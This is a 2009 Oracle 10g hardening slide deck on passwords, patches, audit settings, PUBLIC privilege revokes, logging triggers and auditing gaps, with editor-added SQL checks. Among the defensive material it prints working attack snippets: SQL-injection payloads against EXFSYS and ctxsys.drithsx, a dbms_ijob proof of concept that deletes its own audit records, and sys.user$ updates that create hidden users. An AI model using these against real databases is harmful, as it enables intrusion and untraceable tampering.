8/12/2019 Hardening Oracle
1/33
Best Practices for Oracle Databases
Hardening Oracle 10.2.0.3 / 10.2.0.4
Alexander Kornbrust
Table of Content
Passwords
(Security) Patches
Database Settings
PUBLIC Privileges
Database Trigger
Compiling Views
Next Steps & Summary
Passwords
Weak and default passwords are still problem No. 1 in most Oracle databases.
Even if Oracle default accounts like SYS, SYSTEM and DBSNMP are getting better, user accounts and technical accounts are often using weak passwords (password = username).
It is useless to spend time on Oracle security if the database is using weak/default passwords.
Check (Oracle) passwords on a regular basis against a custom dictionary file.
Check Passwords Regularly
Do not use weak passwords and check all passwords on a regular basis, e.g. with checkpwd or repscan.

C:\>checkpwd system/[email protected]:1521/ORCL password_list.txt
Checkpwd 1.23 [Win] - (c) 2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Training
http://www.red-database-security.com

MDSYS has weak password MDSYS [EXPIRED & LOCKED]
ORDSYS has weak password ORDSYS [EXPIRED & LOCKED]
DUMMY123 has weak password DUMMY123 [OPEN]
DBSNMP OK [OPEN]
SCOTT has weak password TIGER [OPEN]
CTXSYS has weak password CHANGE_ON_INSTALL [EXPIRED & LOCKED]
SH has weak password CHANGE_ON_INSTALL [EXPIRED & LOCKED]
OUTLN has weak password OUTLN [EXPIRED & LOCKED]
DIP has weak password DIP [EXPIRED & LOCKED]
DUMMY321 has weak password 123YMMUD [OPEN]
[...]
SYS OK [OPEN]
SYSTEM OK [OPEN]

Done. Summary:
Passwords checked      : 13900828
Weak passwords found   : 23
Elapsed time (min:sec) : 0:54
Passwords / second     : 265486
(Security) Patches
If the passwords are good it is time to apply (security) patches.
You should always try to upgrade at least to a supported version (e.g. 10.2.0.3 / 10.2.0.4).
After that you should apply the latest security patch from Oracle (January 2009 CPU).
For many reasons (newer version not supported, too many instances, ...) this is not always possible. In this case you should try to use a solution like Virtual Patching.
Oracle Security Community is fast
Exploits for problems fixed with the January 2009 CPU are already published on the internet:

exec EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS('EXFSYS','EXF$VERSION','EXFVERSION','YYYYYYY" and 1=EVILPROC()--')
Database Settings
The next step is to change the default audit settings of Oracle.
audit_sys_operations
By default the database is not auditing SQL commands executed by the user SYS. To change this behaviour it is necessary to set this parameter to TRUE. A restart of the database is necessary after changing this value.
Command:
SQL> alter system set audit_sys_operations=true scope=spfile;
audit_trail
By default the database is not auditing SQL commands. To enable auditing it is necessary to change this parameter to DB. In this case Oracle writes all audit information from the database (but not the Database Vault audit information) into the table SYS.AUD$. Other options are OS, DB, XML and EXTENDED. A restart of the database is necessary after changing this value. EXTENDED is a new feature since Oracle 10g Rel. 2.
Command:
SQL> alter system set audit_trail=DB,EXTENDED scope=spfile;
PUBLIC Privileges
Now it's time to remove dangerous privileges. The only question is:
What is a dangerous package?
If we look at the Oracle Security Checklist (Jul 2008) from Oracle, Oracle recommends removing the PUBLIC privileges from:
UTL_TCP
UTL_SMTP
UTL_MAIL
UTL_HTTP
UTL_INADDR
UTL_FILE
PL/SQL Packages
What are the most dangerous packages in an Oracle database?
dbms_sql
utl_file
utl_mail
utl_inaddr
utl_tcp
dbms_lob
dbms_xmlgen
dbms_aw_xml
ctxsys.drithsx
ordsys.ord_dicom
kupp$proc
PL/SQL Packages
What is the most dangerous package in an Oracle database?
dbms_sql (No. 1, allows privilege escalation)
utl_file
utl_mail
utl_inaddr
utl_tcp (No. 3, take over the DB via the TNS Listener)
dbms_lob
dbms_xmlgen (No. 2, steal the entire DB with a single SQL injection)
dbms_aw_xml
ctxsys.drithsx
ordsys.ord_dicom
kupp$proc
PL/SQL Packages - Sample
Via a vulnerable web application it is possible to retrieve information via error messages:

' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)||' ' from v$version))--
Revoke Public Privileges I
utl_* and dbms_*
These packages are powerful and allow network access (e.g. utl_tcp, utl_http, ...), file access (dbms_advisor, utl_file, ...), insecure functionality (dbms_random) or other powerful operations (e.g. dbms_obfuscation_toolkit). Execute privileges on these packages should not be granted to PUBLIC.
Command (as user SYS):
SQL> revoke execute on utl_http from public force;
SQL> revoke execute on utl_tcp from public force;
SQL> revoke execute on utl_file from public force;
SQL> revoke execute on utl_inaddr from public force;
SQL> revoke execute on utl_smtp from public force;
SQL> revoke execute on utl_dbws from public force;
SQL> revoke execute on dbms_lob from public force;
SQL> revoke execute on dbms_random from public force;
SQL> revoke execute on dbms_obfuscation_toolkit from public force;
Revoke Public Privileges II
SQL> revoke execute on dbms_crypto_toolkit from public force;
SQL> revoke execute on dbms_advisor from public force;
SQL> revoke execute on dbms_ldap from public force;
SQL> revoke execute on dbms_ldap_utl from public force;
SQL> revoke execute on dbms_job from public force;
SQL> revoke execute on dbms_scheduler from public force;
SQL> revoke execute on dbms_ddl from public force;
SQL> revoke execute on dbms_epg from public force;
SQL> revoke execute on dbms_xmlgen from public force;
SQL> revoke execute on dbms_aw_xml from public force;
SQL> revoke execute on ctxsys.drithsx from public force;
SQL> revoke execute on ordsys.ord_dicom from public force;
Revoke dbms_sql from public
dbms_sql
dbms_sql allows privilege escalation via the cursor technique. This problem is fixed in Oracle 11g but still possible in all previous Oracle versions.
Command (as user SYS):
SQL> create role ROLE_DBMSSQL;
SQL> grant execute on dbms_sql to ROLE_DBMSSQL;
SQL> spool grantdbmssql.sql
SQL> select distinct 'grant ROLE_DBMSSQL to "'||owner||'";' from all_dependencies where referenced_name = 'DBMS_SQL' and owner not in ('PUBLIC');
SQL> spool off
SQL> @grantdbmssql
SQL> revoke execute on dbms_sql from PUBLIC;
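The dependency check the slides do for dbms_sql applies to every package in the two revoke lists above. The following PL/SQL block is an added example (not from the slides) that generalizes it: for each package it reports whether PUBLIC still holds EXECUTE, which schemas reference the package (they need a direct grant or a role before the revoke, or their code will become invalid), and the matching revoke statement. It assumes it is run as SYS with DBMS_OUTPUT enabled.

```sql
-- Added example: report PUBLIC execute grants on the packages from the slides
-- and the schemas that depend on them, before anything is revoked.
SET SERVEROUTPUT ON SIZE 1000000
DECLARE
  TYPE name_list IS TABLE OF VARCHAR2(61);
  -- package list taken from the revoke slides (owner.name)
  pkgs name_list := name_list(
    'SYS.UTL_HTTP', 'SYS.UTL_TCP', 'SYS.UTL_FILE', 'SYS.UTL_INADDR',
    'SYS.UTL_SMTP', 'SYS.UTL_DBWS', 'SYS.DBMS_LOB', 'SYS.DBMS_RANDOM',
    'SYS.DBMS_OBFUSCATION_TOOLKIT', 'SYS.DBMS_CRYPTO_TOOLKIT',
    'SYS.DBMS_ADVISOR', 'SYS.DBMS_LDAP', 'SYS.DBMS_LDAP_UTL', 'SYS.DBMS_JOB',
    'SYS.DBMS_SCHEDULER', 'SYS.DBMS_DDL', 'SYS.DBMS_EPG', 'SYS.DBMS_XMLGEN',
    'SYS.DBMS_AW_XML', 'CTXSYS.DRITHSX', 'ORDSYS.ORD_DICOM', 'SYS.DBMS_SQL');
  v_owner VARCHAR2(30);
  v_name  VARCHAR2(30);
  v_cnt   NUMBER;
BEGIN
  FOR i IN 1 .. pkgs.COUNT LOOP
    v_owner := SUBSTR(pkgs(i), 1, INSTR(pkgs(i), '.') - 1);
    v_name  := SUBSTR(pkgs(i), INSTR(pkgs(i), '.') + 1);
    -- does PUBLIC currently hold EXECUTE on this package?
    SELECT COUNT(*) INTO v_cnt
      FROM dba_tab_privs
     WHERE grantee = 'PUBLIC' AND privilege = 'EXECUTE'
       AND owner = v_owner AND table_name = v_name;
    IF v_cnt > 0 THEN
      DBMS_OUTPUT.PUT_LINE('PUBLIC can execute ' || pkgs(i));
      -- schemas whose stored code references the package: grant them
      -- EXECUTE directly (or via a role, as the slides do for DBMS_SQL)
      -- before revoking from PUBLIC, otherwise their objects go invalid
      FOR d IN (SELECT DISTINCT owner
                  FROM dba_dependencies
                 WHERE referenced_owner = v_owner AND referenced_name = v_name
                   AND owner NOT IN ('SYS', 'PUBLIC'))
      LOOP
        DBMS_OUTPUT.PUT_LINE('  referenced by schema ' || d.owner);
      END LOOP;
      DBMS_OUTPUT.PUT_LINE('  revoke execute on ' || pkgs(i) || ' from public force;');
    END IF;
  END LOOP;
END;
/
```

Run it again after the revokes: a clean run prints nothing.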
Revoke public privileges from Object Types
To harden the database it is necessary to revoke some privileges from mighty object types.
HTTPUriType
This object type allows every user to make HTTP requests. This can be used in SQL injection attacks to transfer data out of the database.
Command (as user SYS):
SQL> revoke execute on HTTPUriType from public force;
Database Trigger
Using database triggers (LOGON, LOGOFF, DDL, GRANT, ERROR, SHUTDOWN, STARTUP) is an easy and powerful way to control the database.
Especially DDL triggers and error triggers can help to achieve better control over the database.
DDL Trigger
DDL_TRIGGER
This trigger is monitoring all DDL modifications (grant, alter, create, drop) on the production database. It's necessary to change the IP address inside the trigger.
Command (as user SYS):
SQL> create or replace trigger DDLTrigger
AFTER DDL ON DATABASE
DECLARE
  rc VARCHAR(4096);
BEGIN
  begin
    -- send user, event type, object owner/name and timestamp to the log webserver
    rc := utl_http.request('http://192.168.2.201/user='||ora_login_user||';DDL_TYPE='||ora_sysevent||';DDL_OWNER='||ora_dict_obj_owner||';DDL_NAME='||ora_dict_obj_name||';sysdate='||to_char(sysdate,'YYYY-MM-DD hh24:mi:ss'));
  exception
    -- never block the DDL itself if the webserver is unreachable
    when utl_http.REQUEST_FAILED then null;
  end;
END;
/
Logon Trigger
All logon requests should be monitored with a tamperproof audit log. This could be implemented by using a database logon trigger. This trigger is sending all logon activities to a webserver. It's necessary to change the IP address.
Command (as user SYS):
SQL> create or replace trigger sec_logon after logon on database
DECLARE
  rc VARCHAR(4096);
begin
  begin
    -- send user, session id, client host and client IP with a timestamp to the log webserver
    rc := utl_http.request('http://192.168.2.201/logon_user='||user||';sessionid='||sys_context('USERENV','SESSIONID')||';host='||sys_context('USERENV','HOST')||';ip='||ora_client_ip_address||';sysdate='||to_char(sysdate,'YYYY-MM-DD hh24:mi:ss'));
  exception
    -- never block the logon if the webserver is unreachable
    when utl_http.REQUEST_FAILED then null;
  end;
End sec_logon;
/
Error Trigger
Error trigger (optional)
This trigger is storing all Oracle error messages that occurred on the server. This is really useful to detect attacks, e.g. from SQL injection.
Command (as user SYS):
SQL> CREATE OR REPLACE TRIGGER after_error
AFTER SERVERERROR ON DATABASE
DECLARE
  pragma autonomous_transaction;
  id       NUMBER;
  sql_text ORA_NAME_LIST_T;
  v_stmt   CLOB;
  n        NUMBER;
BEGIN
  -- reassemble the failing statement from its 64-byte chunks
  n := ora_sql_txt(sql_text);
  IF n >= 1 THEN
    FOR i IN 1..n LOOP
      v_stmt := v_stmt || sql_text(i);
    END LOOP;
  END IF;
  -- walk the error stack and keep only the error codes typical for SQL injection attempts
  FOR n IN 1..ora_server_error_depth LOOP
    IF ora_server_error(n) in ('900','906','907','911','917','920','923','933','970','1031','1476','1719','1722','1742','1756','1789','1790','24247','29257','29540') THEN
      INSERT INTO system.oraerror VALUES (SYS_GUID(), sysdate, ora_login_user,
        ora_client_ip_address, ora_server_error(n), ora_server_error_msg(n), v_stmt);
    END IF;
  END LOOP;
  -- the autonomous transaction must be committed, otherwise the insert is rolled back (ORA-06519)
  COMMIT;
END after_error;
/
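The slides never show the table system.oraerror that the error trigger inserts into. The following is an added example (not from the slides): a table definition whose column types match the seven values the trigger inserts positionally (the column names are assumptions, only the order matters), plus a query a DBA can run against it to spot sessions that produce an unusual number of the parse errors the trigger records.

```sql
-- Added example: target table for the error trigger above and a review query.
-- Column names are assumed; the column order matches the trigger's INSERT.
CREATE TABLE system.oraerror (
  id         RAW(16)        NOT NULL,   -- SYS_GUID()
  mydate     DATE           NOT NULL,   -- sysdate
  username   VARCHAR2(30),              -- ora_login_user
  ip_address VARCHAR2(39),              -- ora_client_ip_address (NULL for local sessions)
  err_number NUMBER,                    -- ora_server_error(n)
  err_msg    VARCHAR2(4000),            -- ora_server_error_msg(n)
  stmt       CLOB                       -- statement text reassembled by the trigger
);
CREATE INDEX system.oraerror_date_ix ON system.oraerror (mydate);

-- Sessions that raised many of the recorded errors in the last hour. A single
-- user/IP producing dozens of ORA-00900 (invalid SQL), ORA-00933 (command not
-- properly ended), ORA-01756 (quoted string not terminated) or ORA-01722
-- (invalid number) is the pattern an injection attempt against a web
-- application leaves behind; a normal application produces few or none.
SELECT username, ip_address,
       COUNT(*)                  AS errors,
       COUNT(DISTINCT err_number) AS distinct_codes,
       MIN(mydate)               AS first_seen,
       MAX(mydate)               AS last_seen
  FROM system.oraerror
 WHERE mydate > SYSDATE - 1/24
 GROUP BY username, ip_address
HAVING COUNT(*) >= 10
 ORDER BY errors DESC;

-- Drill down into one suspicious session: the statements as they reached the parser
SELECT mydate, err_number, DBMS_LOB.SUBSTR(stmt, 500, 1) AS stmt_head
  FROM system.oraerror
 WHERE username = 'WEBAPP'            -- constructed example value
   AND mydate > SYSDATE - 1/24
 ORDER BY mydate;
```

The threshold of 10 errors per hour is a starting point and should be tuned against the normal error rate of the application.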
Oracle Auditing Problems and Issues
Oracle Auditing is a 95% solution. If you can live with a 95% solution, Oracle Auditing will be sufficient for you.
Oracle Auditing problems:
can be bypassed in various ways
interesting statements/objects can not be audited
sometimes the wrong statement is logged
Oracle Auditing - Bypassing Auditing
The following problem was fixed with the January 2009 CPU. Running a job with any PL/SQL statement via dbms_ijob does not leave any traces:

Declare
  jj integer := 666666; -- job number
begin
  sys.dbms_ijob.submit(JOB => jj,
    LUSER => 'SYS', PUSER => 'SYS', CUSER => 'SYS',
    NEXT_DATE => sysdate, INTERVAL => null,
    BROKEN => false, WHAT =>
    'declare jj integer := '||jj||';
     begin
       execute immediate ''alter system archive log current'';
       sys.dbms_ijob.remove(jj);
       delete from sys.aud$ where obj$name = ''DBMS_IJOB'';
       commit;
     end;');
  sys.dbms_ijob.run(jj);
end;
/
Oracle Auditing - Important objects not auditable
Important objects can not be audited. It is not possible to audit important tables like sys.user$. This table contains all user, role and password information of the Oracle database.
A password change could be performed by updating the table directly:

SQL> update sys.user$ set password = 'D4DF7931AB130E37' where name='SYSTEM';

This can not be audited:

SQL> audit all on sys.user$;
audit all on sys.user$
ERROR at line 1:
ORA-00701: object necessary for warmstarting database cannot be altered
Oracle Auditing - Important objects not auditable II
Another way to bypass Oracle Auditing is to modify the data dictionary object directly. A user is normally created with the command "CREATE USER myuser identified by mypassword".
Instead of using CREATE USER we can get the same result using CREATE ROLE plus an UPDATE SYS.USER$:

SQL> create role myuser identified by mypassword;
-- convert a role into a user
SQL> update sys.user$ set type#=1 where name='MYUSER';
-- alternative update, creates an invisible database user
SQL> update sys.user$ set type#=2 where name='MYUSER';
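Since the UPDATE on SYS.USER$ itself cannot be audited, the defender's option is to look for its results. The following queries are an added example (not from the slides) that do exactly that for the two tricks above: rows whose type# is neither role nor user, and users that exist in the dictionary although the audit trail only ever saw a CREATE ROLE for that name. They assume they are run as SYS and that AUDIT CREATE USER / CREATE ROLE BY ACCESS has been active since the cut-off date, which is a placeholder to adjust.

```sql
-- Added example: detect accounts that reached SYS.USER$ without a normal CREATE USER.
-- 1. The "invisible user" case: a legitimate row is a role (type# = 0, shown in
--    DBA_ROLES) or a user (type# = 1, shown in DBA_USERS); anything else is suspect.
SELECT name, type#, ctime
  FROM sys.user$
 WHERE type# NOT IN (0, 1)
 ORDER BY ctime DESC;

-- 2. The "role turned into a user" case: users created after the cut-off whose
--    creation was never audited as CREATE USER. The subquery shows what the
--    audit trail did record for that name; 'CREATE ROLE' for a row that is now
--    a user means the type# was changed by hand. Note that the modification
--    itself (UPDATE SYS.USER$) can never show up in the audit trail.
SELECT du.username, du.created,
       (SELECT MIN(a.action_name)
          FROM dba_audit_trail a
         WHERE a.obj_name = du.username
           AND a.action_name IN ('CREATE USER', 'CREATE ROLE')) AS audited_as
  FROM dba_users du
 WHERE du.created > DATE '2009-02-01'   -- assumed: date auditing was switched on
   AND NOT EXISTS (SELECT 1
                     FROM dba_audit_trail a
                    WHERE a.obj_name    = du.username
                      AND a.action_name = 'CREATE USER'
                      AND a.returncode  = 0)
 ORDER BY du.created DESC;
```

Users created before auditing was enabled naturally have no CREATE USER record, hence the cut-off date.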
Oracle Auditing - Wrong statements logged
Since Oracle 10g it is possible to log the statement which caused the audit entry.
This sounds like a good feature, but the database is sometimes (e.g. if VPD or Query Rewrite is used) modifying the SQL statement which was submitted. In this case Oracle is auditing the original statement and not the statement which was actually executed.
This technique can be used to steal information from audited tables without leaving traces.
Auditing I
Enable Auditing
Audit interesting activities.
Command (as user SYS):
AUDIT CREATE USER BY ACCESS;
AUDIT ALTER USER BY ACCESS;
AUDIT DROP USER BY ACCESS;
AUDIT CREATE ROLE BY ACCESS;
AUDIT SELECT ON DBA_USERS BY ACCESS;
AUDIT CREATE EXTERNAL JOB BY ACCESS; -- 10g Rel. 2
AUDIT CREATE JOB BY ACCESS; -- 10g Rel. 1
AUDIT CREATE ANY JOB BY ACCESS;
AUDIT CREATE ANY LIBRARY BY ACCESS;
AUDIT ALTER DATABASE BY ACCESS;
AUDIT ALTER SYSTEM BY ACCESS;
AUDIT AUDIT SYSTEM BY ACCESS;
AUDIT EXEMPT ACCESS POLICY BY ACCESS;
AUDIT GRANT ANY PRIVILEGE BY ACCESS;
Auditing II
Command (as user SYS):
AUDIT GRANT ANY ROLE BY ACCESS;
AUDIT ALTER PROFILE BY ACCESS;
AUDIT CREATE ANY PROCEDURE BY ACCESS;
AUDIT ALTER ANY PROCEDURE BY ACCESS;
AUDIT DROP ANY PROCEDURE BY ACCESS;
AUDIT CREATE PUBLIC DATABASE LINK BY ACCESS;
AUDIT CREATE PUBLIC SYNONYM BY ACCESS;
AUDIT EXECUTE ON DBMS_FGA BY ACCESS;
AUDIT EXECUTE ON DBMS_RLS BY ACCESS;
AUDIT EXECUTE ON DBMS_FILE_TRANSFER BY ACCESS;
AUDIT EXECUTE ON DBMS_SCHEDULER BY ACCESS;
AUDIT EXECUTE ON DBMS_JOB BY ACCESS;
AUDIT SELECT ON SYS.V_$SQL BY ACCESS;
AUDIT SELECT ON SYS.GV_$SQL BY ACCESS;
AUDIT EXECUTE ON SYS.KUPP$PROC BY ACCESS;
AUDIT EXECUTE ON DBMS_XMLGEN BY ACCESS;
AUDIT EXECUTE ON DBMS_NETWORK_ACL_ADMIN BY ACCESS; -- 11g
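Setting audit_sys_operations and audit_trail (Database Settings slides) and issuing the AUDIT ... BY ACCESS statements above only helps if the settings are really in effect after the restart. The following queries are an added example (not from the slides) that verify all three layers and then read the captured records; they assume they are run as SYS on 10g Rel. 2 with the configuration from the slides.

```sql
-- Added example: verify the audit configuration from the slides.
-- 1. Initialization parameters (spfile changes only apply after the restart)
SELECT name, value
  FROM v$parameter
 WHERE name IN ('audit_sys_operations', 'audit_trail', 'audit_file_dest');
-- expected: audit_sys_operations = TRUE, audit_trail = DB, EXTENDED

-- 2. Statement and system privilege audit options set for all users.
--    Every row should read 'BY ACCESS' in both the success and failure column;
--    an option from the slides that is missing here has not been enabled.
SELECT 'statement' AS kind, audit_option AS name, success, failure
  FROM dba_stmt_audit_opts
 WHERE user_name IS NULL
UNION ALL
SELECT 'privilege', privilege, success, failure
  FROM dba_priv_audit_opts
 WHERE user_name IS NULL
 ORDER BY 1, 2;

-- 3. Object audit options for the packages and views audited above:
--    SEL (select) and EXE (execute) read 'A/A' when audited BY ACCESS,
--    'S/S' when only BY SESSION and '-/-' when not audited at all.
SELECT owner, object_name, sel, exe
  FROM dba_obj_audit_opts
 WHERE object_name IN ('DBA_USERS', 'DBMS_FGA', 'DBMS_RLS', 'DBMS_FILE_TRANSFER',
                       'DBMS_SCHEDULER', 'DBMS_JOB', 'V_$SQL', 'GV_$SQL',
                       'KUPP$PROC', 'DBMS_XMLGEN')
 ORDER BY owner, object_name;

-- 4. Records of the last 24 hours, including the statement text that
--    audit_trail = DB, EXTENDED adds (sql_text stays empty with plain DB).
--    SYS activity enabled by audit_sys_operations is not here: it goes to
--    the OS files in audit_file_dest, which is why that directory must be
--    protected and collected separately.
SELECT timestamp, username, userhost, action_name, returncode, obj_name, sql_text
  FROM dba_audit_trail
 WHERE timestamp > SYSDATE - 1
 ORDER BY timestamp DESC;
```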
Recompile All Views
To get rid of the "create view" problem it is necessary to recompile all views. This can be done with the script "$ORACLE_HOME/CPU/cpuapr2008/view_recompile/view_recompile_apr2008cpu.sql". This can take up to 4 hours depending on the size of your database.
Command (as user SYS):
cd $ORACLE_HOME/CPU/cpuapr2008/view_recompile
SQL> @view_recompile_apr2008cpu.sql
Next steps & Summary
This was just the baseline security for Oracle databases. If you need more than this baseline:
Check your own application code
Train the DBAs, developers and security people
Perform regular security audits
Run database scanners regularly
Use 3rd-party products to increase the security
Links
Oracle Password Checker:
http://www.red-database-security.com/software/checkpwd.html
http://www.red-database-security.com/software/repscan.html
Exploit Code for January 2009 CPU:
http://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/
http://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/
Oracle Security Checklist:
http://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdf
Oracle SQL Injection Tutorial:
http://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/
Contact
Alexander Kornbrust
Red-Database-Security GmbH
Bliesstrasse 16
D-66538 Neunkirchen
Germany
Phone: +49 (0)6821 95 17 637
Fax: +49 (0)6821 91 27 354
E-Mail: info @ red-database-security.com